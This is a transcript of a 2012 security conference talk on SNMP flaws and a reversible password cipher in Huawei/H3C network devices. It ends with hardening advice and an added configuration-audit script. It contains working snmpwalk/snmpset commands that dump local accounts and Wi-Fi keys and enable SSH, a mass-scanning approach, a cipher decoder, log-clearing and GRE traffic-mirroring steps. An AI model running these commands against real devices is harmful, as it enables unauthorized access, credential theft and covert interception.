A Country's Honorable n3twork Devices
DESCRIPTION
A discussion on the weaknesses of SNMP and the password cipher used in Huawei and HP/H3C devices. Presented at BayThreat 3 (2012) on December 7, 2012.
TRANSCRIPT
A CouNtry's Honorable n3twork deviCes
Bay Threat 2012 @grutz
BayThreat 2012 -- @grutz A CouNtry's Honorable n3twork deviCes
BACKGROUND
Disclaimer
Any content or opinion stated herein is that of myself and not of my employer. The information is being provided "as-is" and as a convenience, for informational purposes only. Any resemblance to real persons, living or dead, is purely coincidental. No warranty is expressed or implied. Not responsible for direct, indirect, incidental or consequential damages resulting from any defect, error or failure to perform. For recreational use only. May be too intense for some viewers.
POLITICS!
This presentation does not care about the politics between China, the US and any companies. Data is presented to show the pervasive risk these new vulnerabilities create. China was only used because they have the largest install base of Huawei and H3C equipment available via the Internet!
About @grutz…
Penetration tester
In the business of breaking into businesses (business business)
The Huawei/H3C/HP Timeline
2006: Huawei-3Com Partnership
May 7, 2007: H3C is born!
Sep 28, 2007: Bain Capital / Huawei / 3Com deal
2008: US Gov't Smackdown
April 12, 2010: HP Acquires H3C
Oct 8, 2012: US Gov't Huawei/ZTE Smackdown
Huawei != H3C
...except when they are (software). Since the creation of H3C by Huawei-3Com the two companies diverged their product lines, yet they still shared a very similar code origin (and bugs!). Vulnerabilities described here and in FX's talk can generally affect Huawei devices in the Huawei-3Com years (2006-2010) and all H3C devices.
FX’s Huawei DEFCON Bomb
Huawei’s July 31, 2012 Response to c|net
http://news.cnet.com/8301-1009_3-57482813-83/expert-huawei-routers-are-riddled-with-vulnerabilities/
LET'S TALK BIG BANG
Overflows are cool…
…but they're finicky little beasts. Huawei/H3C not as bad as Cisco IOS but, still... How many times have you used an IOS buffer overflow?
No, really… Be serious here!
Now how many times have you used SNMP to download device configs? Which would you rely upon for network penetration?
h3c (old) vs hh3c (new)
"For a node in the H3C new-style MIB files, its name starts with hh3c, and its OID starts with 1.3.6.1.4.1.25506; for a node in the H3C compatible-style MIB files, its name starts with h3c, and its OID starts with 1.3.6.1.4.1.2011.10. For example, node hh3cCfgOperateType with the OID of 1.3.6.1.4.1.25506.2.4.1.2.4.1.2 is in file hh3c-config-man.mib, and node h3cCfgOperateType with the OID of 1.3.6.1.4.1.2011.10.2.4.1.2.4.1.2 is in file h3c-config-man.mib. Both of the two nodes indicate the same variable in the agent, but they are in different MIB style. By default, devices use H3C new-style MIB files."
Source: http://www.h3c.com/portal/Products___Solutions/Technology/System_Management/Configuration_Example/200912/656452_57_0.htm#_Toc247357228
(T)FTP File Transfers: hh3c-config-man
Function                OID                                    Operator
Operation type          1.3.6.1.4.1.25506.2.4.1.2.4.1.2.xx     1 - running2Startup, 2 - startup2Running, 3 - running2Net, 4 - net2Running, 5 - net2Startup, 6 - startup2Net
Protocol                1.3.6.1.4.1.25506.2.4.1.2.4.1.3.xx     1 - ftp, 2 - tftp, 3 - clusterftp, 4 - clustertftp
Filename                1.3.6.1.4.1.25506.2.4.1.2.4.1.4.xx     filename
Destination IP Address  1.3.6.1.4.1.25506.2.4.1.2.4.1.5.xx     IpAddress
Username                1.3.6.1.4.1.25506.2.4.1.2.4.1.6.xx     FTP Username
Password                1.3.6.1.4.1.25506.2.4.1.2.4.1.7.xx     FTP Password
RowStatus               1.3.6.1.4.1.25506.2.4.1.2.4.1.9.xx     4 - go go go move move move!
hh3c-config-man caveats
Support is spotty between device types. Mostly routers and switches work. H3C ERxxxx Series: OpType = 1 (system2net)
Downloads are logged. Requires Read/Write community string. Buggy!
Manual "snmpset" worked some of the time. Metasploit module worked some of the time.
https://github.com/grutz/h3c-pt-tools/blob/master/hh3c-snmpdl.sh
Let’s script…
HP/H3C, SNMP, LOCAL ACCOUNTS AND YOU!
Usernames and Passwords in SNMP? Never!
Huawei/H3C Password Encryption Types
(h)h3cAuthMode designates the encryption storage type:
  0: No encryption
  3: Ciphertext "encryption", e.g. 7-CZB#/YX]KQ=^Q`MAF4<1!!
  9: SHA-256 encryption, $key$hash_digest_value (since 2007, mostly AR devices)
hh3cUserLevel / hh3cUserState
RFC-1902: SMI for SNMPv2
What is MAX-ACCESS and read-create?
…so it's protected, right?
Sure it is! Unless you know the SNMP READ ONLY string… This was probably a bug… or a misunderstanding…
Let's glob some users!
$ snmpwalk -c public -v 1 <host> 1.3.6.1.4.1.2011.10.2.12.1.1.1
Walks the locally defined list of users:
  local user <username>
    password <clear|cipher|sha256> <value>
    level [0|1|2|3]
Let’s Weaponize it!
Other SNMP goodies…
(h)h3c-dot11-cfg (requires R/W access): SSID / PSKs
  snmpwalk -v 1 -c private ip-address 1.3.6.1.4.1.2011.10.2.75
(h)h3c-ssh (requires R/W access)
  SSH Server disabled? Enable it!
  snmpset -v 1 -c private ip-address 1.3.6.1.4.1.25506.2.22.1.1.1.7 i 1
Strap In and Let’s Scan China!
INCONCEIVABLE!
http://www.okean.com/chinacidr.txt: 2,444 netblocks, 290,118,656 hosts. Only care about SNMP.
Onesixtyone to the rescue! Originally by Solar Eclipse; updated in 2011 by Paul Flo Williams: https://github.com/hisdeedsaredust/onesixtyone
For best results use a VPS/host from a country China trusts
L33t b@$h sk1ddy
China Network Device Counts (Oct 2012)
[Chart: device counts by vendor, one series per SNMP access level]
Vendor         SNMP R/O    SNMP R/W
Huawei / H3C   117,033     88,517
ZTE            64,579      33,669
Cisco          11,278      2,475
Juniper        273         99
vxWorks        8,121       -
Source: Personal scan of China Netblock ranges using SNMP strings "public", "private", "h3c", "china" and "telecom"
Compare H3C results from ShodanHQ
(h)h3c-user Results
Devices with locally defined accounts: 15,588
Devices with ciphered passwords: 5,132
Devices with cleartext passwords: 15,263
Total accounts/passwords: 33,938
Unique passwords: 3,898
Username == Password: 2,101
Unique version strings: 686
A majority of cleartext-only passwords were from one Telecom company.
What Type of Accounts are these?
Local users can be used for: remote management access (telnet, ssh, web); VPN access.
In most cases telnet, ssh and http were open on devices with locally defined accounts.
Device type breakdown
Huawei/H3C VRP: 2,293
SecPath/SecBlade Firewalls: 464
WA2xxx Access Points: 2,771
Huawei Quidway: 3,205
SO ABOUT THAT CIPHER…
Huawei/H3C Not Unique In This
Weak and reversible ciphers seem to be a standard for all networking companies at one time:
Cisco Type 7 (a Vigenère cipher), Juniper $9$
Generally these are used because some protocols need to use cleartext passwords yet these should not be stored in the clear. So… why not ROT13? Just as secure…
Cipher Examples
CLEARTEXT                         CIPHER
a                                 D(HD%5.*MN;Q=^Q`MAF4<1!!
aa                                P+J^5@ZGG[3Q=^Q`MAF4<1!!
aaa                               +Q4Z3D_*-N[Q=^Q`MAF4<1!!
123                               7-CZB#/YX]KQ=^Q`MAF4<1!!
aaaa                              EHHC8L%9.F3Q=^Q`MAF4<1!!
aaaaa                             X`9:NJ_A#$WQ=^Q`MAF4<1!!
aaaaaa                            B.7)"^_<OGCQ=^Q`MAF4<1!!
huawei                            N`C55QK<`=/Q=^Q`MAF4<1!!
aaaaaaaa                          2P;JH_C3'+_Q=^Q`MAF4<1!!
aaaaaaaaaaaaaaaaaaaa              2P;JH_C3'+^'^KG@[*)9LZ*ZYF[R'$:5M(0=0\)*5WWQ=^Q`MAF4<<"TX$_S#6.NM(0=0\)*5WWQ=^Q`MAF4<1!!
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa  2P;JH_C3'+^'^KG@[*)9LU<WK:`IEBCP2P;JH_C3'+_Q=^Q`MAF4<<"TX$_S#6.NM(0=0\)*5WWQ=^Q`MAF4<1!!
Want more examples? jfgi!
This means something…
Ciphers are 24 or 88 chars in length. '!!' at the end of everything.
Base64 rotational? Good idea, but no… didn't pan out.
Consistent last few bytes of data: Q=^Q`MAF4<1!!
Consistent first 10 characters (2P;JH_C3'+) when the cleartext is >= 8 characters.
Probably using a block-based cipher
Identical plaintext blocks encrypt to identical cipher blocks:
Binary/ASCII Encoding
Let's assume DES-ECB: probably a static key. Input = cleartext + null padding.
Output = binary data. Binary result converted to printable ASCII. ASCII NOT Base64 but similar (4 chars to 3 bytes). A consistent cipher string length based on source length means we're probably correct.
Let's decode to binary!

    def decode_cipher(cipher):
        """Turn the printable-ASCII cipher string into raw bytes.
        Each character carries 6 bits (ord(char) - 33); 4 characters -> 3 bytes.
        A literal 'a' is replaced by '?' as in the original converter."""
        result = bytearray()
        chkval = ord('a')
        cipherlen = len(cipher)
        # converter works in groups of 4 until cipherlen is reached
        for cnt in range(0, cipherlen, 4):
            cv2 = 0
            for cipher_loc in range(cnt, cnt + 4):
                cv1 = ord(cipher[cipher_loc])
                if cv1 == chkval:
                    cv1 = ord('?')
                # shift the bits collected so far and append this character's 6 bits
                cv2 = (cv2 << 6) | (cv1 - 33)
            # output: three bytes from the 24 collected bits
            result.append((cv2 & 0xff0000) >> 16)
            result.append((cv2 & 0xff00) >> 8)
            result.append(cv2 & 0xff)
        return bytes(result)
Huawei's Solution
Use AES-256 and updated software for SNMP. Yes.. AES-256.. A symmetric cipher.
http://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS1000001141
HP/H3C's Solution
Use SHA-256 on those systems that support it. Upgrade your code for the SNMP fix.
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03515685
So about this SHA-256…
Yeah, salted SHA-256. Not reversible but crackable!
h3c:$eoaM56nX$ff570abf74e0f5e24b1b6d7438bf9260f2c402934985bf694412cf45dc2e34f5
pw:$8fRj3Ju.$f54c881eb4099465ef619dd3993a63fa8993cd24a45f424d101c293734531878
NOW WHAT?
Things to watch out for
All commands are logged locally: > reset logbuffer
Keyboard keys are very annoying
Backspace is not backspace, unless it's ^H
See All Packets!!!
<rtr1> system-view
[rtr-1] interface tunnel 1/0/1
[rtr-1-Tunnel1/0/1] ip address 10.10.10.1 255.255.255.0
[rtr-1-Tunnel1/0/1] tunnel-protocol gre
[rtr-1-Tunnel1/0/1] source 10.10.1.1
[rtr-1-Tunnel1/0/1] destination 192.168.1.1
[rtr-1-Tunnel1/0/1] quit
[rtr-1] ip route-static 192.168.2.1 255.255.255.0 tunnel 1/0/1
linux# modprobe ip_gre
linux# ip tunnel add gre0 mode gre remote 10.10.1.1 local 192.168.1.1 ttl 255
linux# ip link set gre0 up
linux# ip addr add 10.10.10.2/24 dev gre0
PROTECT YOURSELF
Be protected.. Be be protected!
Don't configure local accounts, use RADIUS or TACACS+
Don't configure SNMPv1
Don't use default SNMP strings
Disable the snmp view for (h)h3c-user:
  snmp-agent mib-view excluded 1.3.6.1.4.1.2011.10.2.12.1.1.1
  snmp-agent mib-view excluded 1.3.6.1.4.1.25506.2.12.1.1.1
Use SHA256 passwords if your image supports it
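The following Python audit is an added example, not a tool from the talk, from HP/H3C or from Huawei. It reads a Comware-style configuration dump and reports the exposures this deck covers, tying the Password Encryption Types slide to this one: local accounts stored with authMode 0 (clear) or 3 (cipher) instead of 9 (sha256), default or guessable community strings (the talk's scan list plus public/private), SNMPv1 enabled, and either (h)h3c-user OID missing from the excluded MIB view. Both configuration texts are constructed for the example; the command forms follow the slides (the parser also accepts the `simple` password keyword and treats the mib-view view name as optional because the slide's lines omit it), and the cipher and sha256 values in the weak config are copied from the deck.

```python
# Added example, not a tool from the talk, HP/H3C or Huawei: audit a
# Comware-style configuration for the exposures this deck describes.
import re

# The two (h)h3c-user table OIDs from the slides (old h3c and new hh3c MIB).
USER_OIDS = ("1.3.6.1.4.1.2011.10.2.12.1.1.1", "1.3.6.1.4.1.25506.2.12.1.1.1")
# Community strings the talk's scan tried, which include the two classic defaults.
GUESSABLE_COMMUNITIES = {"public", "private", "h3c", "china", "telecom"}

# Constructed sample configuration (not from any real device). The cipher and
# sha256 values are the ones shown on the slides.
WEAK_CONFIG = """\
 sysname rtr-1
#
snmp-agent
snmp-agent community read public
snmp-agent community write n0tDefault-RW
snmp-agent sys-info version v1 v2c
snmp-agent mib-view excluded NoUsers 1.3.6.1.4.1.2011.10.2.12.1.1.1
#
local-user admin
 password cipher 7-CZB#/YX]KQ=^Q`MAF4<1!!
 level 3
local-user backup
 password clear backup
 level 1
local-user ops
 password sha256 $8fRj3Ju.$f54c881eb4099465ef619dd3993a63fa8993cd24a45f424d101c293734531878
 level 2
#
"""

# The same device after applying the slide's advice: AAA instead of local
# users, no v1, non-default strings, both user-table OIDs excluded (constructed).
HARDENED_CONFIG = """\
 sysname rtr-1
#
snmp-agent
snmp-agent community read r0-Gx7pq
snmp-agent community write rw-Lk2zm
snmp-agent sys-info version v3
snmp-agent mib-view excluded NoUsers 1.3.6.1.4.1.2011.10.2.12.1.1.1
snmp-agent mib-view excluded NoUsers 1.3.6.1.4.1.25506.2.12.1.1.1
#
"""


def audit_config(text):
    """Return (severity, finding) pairs; an empty list means nothing to report."""
    findings = []
    excluded = set()
    current_user = None
    user_count = 0
    for raw in text.splitlines():
        line = raw.strip()
        if line == "#":  # stanza separator
            current_user = None
            continue
        m = re.match(r"local-user (\S+)", line)
        if m:
            current_user = m.group(1)
            user_count += 1
            continue
        # authMode 0 = clear, 3 = cipher, 9 = sha256; only the last is acceptable
        m = re.match(r"password (clear|simple|cipher|sha256)\b", line)
        if m and current_user:
            mode = m.group(1)
            if mode in ("clear", "simple"):
                findings.append(("high", f"local-user {current_user}: password stored in cleartext"))
            elif mode == "cipher":
                findings.append(("high", f"local-user {current_user}: password uses the reversible cipher"))
            continue
        m = re.match(r"snmp-agent community (read|write) (\S+)", line)
        if m:
            access, community = m.groups()
            if community.lower() in GUESSABLE_COMMUNITIES:
                findings.append(("high", f"SNMP {access} community '{community}' is a default or guessable string"))
            continue
        m = re.match(r"snmp-agent sys-info version (.+)", line)
        if m:
            versions = set(m.group(1).split())
            if "v1" in versions or "all" in versions:
                findings.append(("medium", "SNMPv1 is enabled (snmp-agent sys-info version)"))
            continue
        # the view name is optional here because the slide's example lines omit it
        m = re.match(r"snmp-agent mib-view excluded (?:\S+ )?(\d[\d.]*)$", line)
        if m:
            excluded.add(m.group(1))
    for oid in USER_OIDS:
        if oid not in excluded:
            findings.append(("high", f"user table {oid} is readable: not excluded from the SNMP MIB view"))
    if user_count:
        findings.append(("info", f"{user_count} local account(s) defined; prefer RADIUS or TACACS+"))
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {label} ==")
        for severity, finding in audit_config(cfg) or [("ok", "no findings")]:
            print(f"[{severity}] {finding}")
```

Running it on a saved `display current-configuration` output gives a quick pass/fail for the four items on this slide; the view-exclusion check is the one most often missed, because a device can have SNMPv1 disabled and strong strings and still hand the local user table to anyone holding the read-only string.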
QUESTIONS?
http://github.com/grutz/h3c-pt-tools/
http://grutztopia.jingojango.net/
Thanks to #metasploit, hdm, FX, eMaze (Ivan and Roberto), HP/H3C and Huawei IRTs, US-CERT and others whom I may have forgotten